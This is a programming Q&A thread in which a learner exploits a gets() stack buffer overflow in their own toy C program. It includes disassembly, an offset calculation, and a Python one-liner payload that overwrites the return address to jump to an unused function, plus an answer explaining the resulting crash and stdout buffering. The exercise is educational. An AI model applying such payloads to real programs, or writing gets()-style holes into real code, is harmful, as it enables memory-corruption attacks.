# exploiting Buffer Overflow using gets() in a simple C program

Tags: c, buffer-overflow, exploit, gets

I am new to Buffer Overflow exploits and I started with a simple C program.

***Code***

```
#include <stdio.h>
#include <strings.h>


void execs(void){
    printf("yay!!");
}

void return_input (void)
{
    char array[30];
    gets(array);
}

int main()
{
    return_input();
    return 0;
}
```

***Compilation stage***

I compiled the above program with cc by disabling `stack protector` as:

```
cc test.c -o test -fno-stack-protector
```

The dump of the elf file using `objdump` is as follows :

```
0804843b <execs>:
 804843b:   55                      push   %ebp
 804843c:   89 e5                   mov    %esp,%ebp
 804843e:   83 ec 08                sub    $0x8,%esp
 8048441:   83 ec 0c                sub    $0xc,%esp
 8048444:   68 10 85 04 08          push   $0x8048510
 8048449:   e8 b2 fe ff ff          call   8048300 <printf@plt>
 804844e:   83 c4 10                add    $0x10,%esp
 8048451:   90                      nop
 8048452:   c9                      leave  
 8048453:   c3                      ret    

08048454 <return_input>:
 8048454:   55                      push   %ebp
 8048455:   89 e5                   mov    %esp,%ebp
 8048457:   83 ec 28                sub    $0x28,%esp
 804845a:   83 ec 0c                sub    $0xc,%esp
 804845d:   8d 45 da                lea    -0x26(%ebp),%eax
 8048460:   50                      push   %eax
 8048461:   e8 aa fe ff ff          call   8048310 <gets@plt>
 8048466:   83 c4 10                add    $0x10,%esp
 8048469:   90                      nop
 804846a:   c9                      leave  
 804846b:   c3                      ret    

0804846c <main>:
 804846c:   8d 4c 24 04             lea    0x4(%esp),%ecx
 8048470:   83 e4 f0                and    $0xfffffff0,%esp
 8048473:   ff 71 fc                pushl  -0x4(%ecx)
 8048476:   55                      push   %ebp
 8048477:   89 e5                   mov    %esp,%ebp
 8048479:   51                      push   %ecx
 804847a:   83 ec 04                sub    $0x4,%esp
 804847d:   e8 d2 ff ff ff          call   8048454 <return_input>
 8048482:   b8 00 00 00 00          mov    $0x0,%eax
 8048487:   83 c4 04                add    $0x4,%esp
 804848a:   59                      pop    %ecx
 804848b:   5d                      pop    %ebp
 804848c:   8d 61 fc                lea    -0x4(%ecx),%esp
 804848f:   c3                      ret
```

So, In order to exploit the buffer(`array`), we need to find the number of bytes allocated in the `return_input` stack frame which by looking at the dump,

```
lea    -0x26(%ebp),%eax
```

is `0x26` in hex or roughly 38 in decimal. So, giving input as :

> 38+4(random chars)+(return addr of execs)

would execute the `execs` function. I used the following:

```
python -c 'print "a"*42+"\x3b\x84\x04\x08"' | ./test
```

But output ***Error*** was:

> Segmentation fault(core dumped)

When I opened the `core`(core dumped file) using `gdb`, I could find that the segmentation fault was experienced when executing on the following address :

```
0xb76f2300
```

***System information:***

> Ubuntu version : 16.10
>
> Kernel version : 4.8.0-46-generic

**Question?**

What was I doing wrong in code?

Comment: For anyone else trying to reproduce this example, the exact `objdump` command required to print out the assembly is `objdump -d test`.

Answer (score 8, accepted):

I guess the reason is simple: you didn't *halt*/*abort* your program in the `execs`. That address `0xb76f2300` is on stack, so I suspect it is the return from the `execs` that fails when it tries to return to the value of the stored stack pointer.

That you don't see any message is because the `stdout` is *line-buffered*, and your message didn't have a new-line character, nor did you flush it explicitly; thus the `yay!!` will still be in the buffers.

Also, use a debugger.

Comment: Thanks, that works. And a small doubt. Why should I flush stdout explicitly? Won't it happen by default?

Comment: Since it is line buffered, it is flushed when a newline is printed, or if it is asked explicitly. Normal program terminatiom should also flush it, but as you see the program does not normally terminate.